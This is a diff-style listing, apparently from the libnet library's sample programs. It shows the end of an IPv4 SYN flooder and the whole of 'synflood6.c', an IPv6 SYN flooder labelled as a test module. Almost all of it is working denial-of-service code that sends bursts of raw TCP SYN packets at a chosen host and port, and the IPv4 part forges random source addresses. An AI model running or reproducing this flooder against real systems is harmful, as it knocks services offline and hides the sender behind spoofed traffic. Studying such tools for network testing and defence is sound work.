dst_prt,
|
131
|
+
libnet_get_prand(LIBNET_PRu32),
|
132
|
+
libnet_get_prand(LIBNET_PRu32),
|
133
|
+
TH_SYN,
|
134
|
+
libnet_get_prand(LIBNET_PRu16),
|
135
|
+
0,
|
136
|
+
0,
|
137
|
+
LIBNET_TCP_H,
|
138
|
+
NULL,
|
139
|
+
0,
|
140
|
+
l,
|
141
|
+
t);
|
142
|
+
|
143
|
+
if (build_ip)
|
144
|
+
{
|
145
|
+
build_ip = 0;
|
146
|
+
libnet_build_ipv4(
|
147
|
+
LIBNET_TCP_H + LIBNET_IPV4_H,
|
148
|
+
0,
|
149
|
+
libnet_get_prand(LIBNET_PRu16),
|
150
|
+
0,
|
151
|
+
libnet_get_prand(LIBNET_PR8),
|
152
|
+
IPPROTO_TCP,
|
153
|
+
0,
|
154
|
+
src_ip = libnet_get_prand(LIBNET_PRu32),
|
155
|
+
dst_ip,
|
156
|
+
NULL,
|
157
|
+
0,
|
158
|
+
l,
|
159
|
+
0);
|
160
|
+
}
|
161
|
+
c = libnet_write(l);
|
162
|
+
if (c == -1)
|
163
|
+
{
|
164
|
+
fprintf(stderr, "libnet_write: %s\n", libnet_geterror(l));
|
165
|
+
}
|
166
|
+
#if !(__WIN32__)
|
167
|
+
usleep(250);
|
168
|
+
#else
|
169
|
+
Sleep(250);
|
170
|
+
#endif
|
171
|
+
|
172
|
+
printf("%15s:%5d ------> %15s:%5d\n",
|
173
|
+
libnet_addr2name4(src_ip, 1),
|
174
|
+
ntohs(src_prt),
|
175
|
+
libnet_addr2name4(dst_ip, 1),
|
176
|
+
dst_prt);
|
177
|
+
}
|
178
|
+
#if !(__WIN32__)
|
179
|
+
sleep(burst_int);
|
180
|
+
#else
|
181
|
+
Sleep(burst_int * 1000);
|
182
|
+
#endif
|
183
|
+
}
|
184
|
+
exit(EXIT_SUCCESS);
|
185
|
+
}
|
186
|
+
|
187
|
+
|
188
|
+
void
|
189
|
+
usage(char *nomenclature)
|
190
|
+
{
|
191
|
+
fprintf(stderr,
|
192
|
+
"\n\nusage: %s -t -a [-i -b]\n"
|
193
|
+
"\t-t target, (ip.address.port: 192.168.2.6.23)\n"
|
194
|
+
"\t-a number of packets to send per burst\n"
|
195
|
+
"\t-i packet burst sending interval (defaults to 0)\n"
|
196
|
+
"\t-b number packet bursts to send (defaults to 1)\n" , nomenclature);
|
197
|
+
}
|
198
|
+
|
199
|
+
|
200
|
+
/* EOF */
|
@@ -0,0 +1,209 @@
|
|
1
|
+
/*
|
2
|
+
* $Id: synflood6.c,v 1.2 2004/03/01 20:26:12 mike Exp $
|
3
|
+
*
|
4
|
+
* Poseidon++ (c) 1996 - 2003 Mike D. Schiffman <mike@infonexus.com>
|
5
|
+
* SYN flooder rewritten for no good reason. Again as libnet test module.
|
6
|
+
* Again for libnet 1.1.
|
7
|
+
* All rights reserved.
|
8
|
+
*
|
9
|
+
* Modifications for ipv6 by Stefan Schlott <stefan@ploing.de>
|
10
|
+
*
|
11
|
+
* Redistribution and use in source and binary forms, with or without
|
12
|
+
* modification, are permitted provided that the following conditions
|
13
|
+
* are met:
|
14
|
+
* 1. Redistributions of source code must retain the above copyright
|
15
|
+
* notice, this list of conditions and the following disclaimer.
|
16
|
+
* 2. Redistributions in binary form must reproduce the above copyright
|
17
|
+
* notice, this list of conditions and the following disclaimer in the
|
18
|
+
* documentation and/or other materials provided with the distribution.
|
19
|
+
*
|
20
|
+
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
|
21
|
+
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
22
|
+
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
23
|
+
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
|
24
|
+
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
|
25
|
+
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
|
26
|
+
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
|
27
|
+
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
|
28
|
+
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
|
29
|
+
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
|
30
|
+
* SUCH DAMAGE.
|
31
|
+
*
|
32
|
+
*/
|
33
|
+
|
34
|
+
#if (HAVE_CONFIG_H)
|
35
|
+
#include "../include/config.h"
|
36
|
+
#endif
|
37
|
+
#include "./libnet_test.h"
|
38
|
+
|
39
|
+
struct t_pack
|
40
|
+
{
|
41
|
+
struct libnet_ipv6_hdr ip;
|
42
|
+
struct libnet_tcp_hdr tcp;
|
43
|
+
};
|
44
|
+
|
45
|
+
|
46
|
+
int
|
47
|
+
main(int argc, char **argv)
|
48
|
+
{
|
49
|
+
struct libnet_in6_addr dst_ip;
|
50
|
+
struct libnet_in6_addr src_ip;
|
51
|
+
u_short dst_prt = 0;
|
52
|
+
u_short src_prt = 0;
|
53
|
+
libnet_t *l;
|
54
|
+
libnet_ptag_t t;
|
55
|
+
u_char *cp;
|
56
|
+
char errbuf[LIBNET_ERRBUF_SIZE];
|
57
|
+
int i, c, packet_amt, burst_int, burst_amt, build_ip;
|
58
|
+
char srcname[100],dstname[100];
|
59
|
+
|
60
|
+
packet_amt = 0;
|
61
|
+
burst_int = 0;
|
62
|
+
burst_amt = 1;
|
63
|
+
|
64
|
+
printf("libnet 1.1 syn flooding: TCP6[raw]\n");
|
65
|
+
|
66
|
+
/*
|
67
|
+
* Initialize the library. Root priviledges are required.
|
68
|
+
*/
|
69
|
+
l = libnet_init(
|
70
|
+
LIBNET_RAW6, /* injection type */
|
71
|
+
NULL, /* network interface */
|
72
|
+
errbuf); /* error buffer */
|
73
|
+
|
74
|
+
if (l == NULL)
|
75
|
+
{
|
76
|
+
fprintf(stderr, "libnet_init() failed: %s", errbuf);
|
77
|
+
exit(EXIT_FAILURE);
|
78
|
+
}
|
79
|
+
|
80
|
+
while((c = getopt(argc, argv, "t:a:i:b:")) != EOF)
|
81
|
+
{
|
82
|
+
switch (c)
|
83
|
+
{
|
84
|
+
case 't':
|
85
|
+
if (!(cp = strrchr(optarg, '/')))
|
86
|
+
{
|
87
|
+
usage(argv[0]);
|
88
|
+
exit(EXIT_FAILURE);
|
89
|
+
}
|
90
|
+
*cp++ = 0;
|
91
|
+
dst_prt = (u_short)atoi(cp);
|
92
|
+
dst_ip = libnet_name2addr6(l, optarg, 1);
|
93
|
+
if (strncmp((char*)&dst_ip,(char*)&in6addr_error,sizeof(in6addr_error))==0)
|
94
|
+
{
|
95
|
+
fprintf(stderr, "Bad IP6 address: %s\n", optarg);
|
96
|
+
exit(EXIT_FAILURE);
|
97
|
+
}
|
98
|
+
break;
|
99
|
+
case 'a':
|
100
|
+
packet_amt = atoi(optarg);
|
101
|
+
break;
|
102
|
+
case 'i':
|
103
|
+
burst_int = atoi(optarg);
|
104
|
+
break;
|
105
|
+
case 'b':
|
106
|
+
burst_amt = atoi(optarg);
|
107
|
+
break;
|
108
|
+
default:
|
109
|
+
usage(argv[0]);
|
110
|
+
exit(EXIT_FAILURE);
|
111
|
+
}
|
112
|
+
}
|
113
|
+
|
114
|
+
src_ip = libnet_name2addr6(l, "0:0:0:0:0:0:0:1", LIBNET_DONT_RESOLVE);
|
115
|
+
/*src_ip = libnet_name2addr6(l, "3ffe:400:60:4d:250:fcff:fe2c:a9cd", LIBNET_DONT_RESOLVE);
|
116
|
+
dst_prt = 113;
|
117
|
+
dst_ip = libnet_name2addr6(l, "nathan.ip6.uni-ulm.de", LIBNET_RESOLVE);
|
118
|
+
packet_amt = 1;*/
|
119
|
+
|
120
|
+
if (!dst_prt || strncmp((char*)&dst_ip,(char*)&in6addr_error,sizeof(in6addr_error))==0 || !packet_amt)
|
121
|
+
{
|
122
|
+
usage(argv[0]);
|
123
|
+
exit(EXIT_FAILURE);
|
124
|
+
}
|
125
|
+
|
126
|
+
|
127
|
+
|
128
|
+
libnet_seed_prand(l);
|
129
|
+
libnet_addr2name6_r(src_ip,1,srcname,sizeof(srcname));
|
130
|
+
libnet_addr2name6_r(dst_ip,1,dstname,sizeof(dstname));
|
131
|
+
|
132
|
+
for(t = LIBNET_PTAG_INITIALIZER, build_ip = 1; burst_amt--;)
|
133
|
+
{
|
134
|
+
for (i = 0; i < packet_amt; i++)
|
135
|
+
{
|
136
|
+
char payload[56];
|
137
|
+
int i;
|
138
|
+
for (i=0; i<56; i++) payload[i]='A'+((char)(i%26));
|
139
|
+
t = libnet_build_tcp(
|
140
|
+
src_prt = libnet_get_prand(LIBNET_PRu16),
|
141
|
+
dst_prt,
|
142
|
+
libnet_get_prand(LIBNET_PRu32),
|
143
|
+
libnet_get_prand(LIBNET_PRu32),
|
144
|
+
TH_SYN,
|
145
|
+
libnet_get_prand(LIBNET_PRu16),
|
146
|
+
0,
|
147
|
+
0,
|
148
|
+
LIBNET_TCP_H,
|
149
|
+
NULL,
|
150
|
+
0,
|
151
|
+
l,
|
152
|
+
t);
|
153
|
+
|
154
|
+
if (build_ip)
|
155
|
+
{
|
156
|
+
build_ip = 0;
|
157
|
+
printf("Packet len = %ld\n",LIBNET_ICMPV6_H+sizeof(payload));
|
158
|
+
libnet_build_ipv6(0,0,
|
159
|
+
LIBNET_TCP_H,
|
160
|
+
IPPROTO_TCP,
|
161
|
+
64,
|
162
|
+
src_ip,
|
163
|
+
dst_ip,
|
164
|
+
NULL,
|
165
|
+
0,
|
166
|
+
l,
|
167
|
+
0);
|
168
|
+
//libnet_autobuild_ipv6(LIBNET_TCP_H,IPPROTO_TCP,dst_ip,l);
|
169
|
+
}
|
170
|
+
printf("%15s/%5d -> %15s/%5d\n",
|
171
|
+
srcname,
|
172
|
+
ntohs(src_prt),
|
173
|
+
dstname,
|
174
|
+
dst_prt);
|
175
|
+
c = libnet_write(l);
|
176
|
+
if (c == -1)
|
177
|
+
{
|
178
|
+
fprintf(stderr, "libnet_write: %s\n", libnet_geterror(l));
|
179
|
+
}
|
180
|
+
#if !(__WIN32__)
|
181
|
+
usleep(250);
|
182
|
+
#else
|
183
|
+
Sleep(250);
|
184
|
+
#endif
|
185
|
+
|
186
|
+
}
|
187
|
+
#if !(__WIN32__)
|
188
|
+
sleep(burst_int);
|
189
|
+
#else
|
190
|
+
Sleep(burst_int * 1000);
|
191
|
+
#endif
|
192
|
+
}
|
193
|
+
exit(EXIT_SUCCESS);
|
194
|
+
}
|
195
|
+
|
196
|
+
|
197
|
+
void
|
198
|
+
usage(char *nomenclature)
|
199
|
+
{
|
200
|
+
fprintf(stderr,
|
201
|
+
"\n\nusage: %s -t -a [-i -b]\n"
|
202
|
+
"\t-t target, (ip6:address/port, e.g. ::1/23)\n"
|
203
|
+
"\t-a number of packets to send per burst\n"
|
204
|
+
"\t-i packet burst sending interval (defaults to 0)\n"
|
205
|
+
"\t-b number packet bursts to send (defaults to 1)\n" , nomenclature);
|
206
|
+
}
|
207
|
+
|
208
|
+
|
209
|
+
/* EOF */
|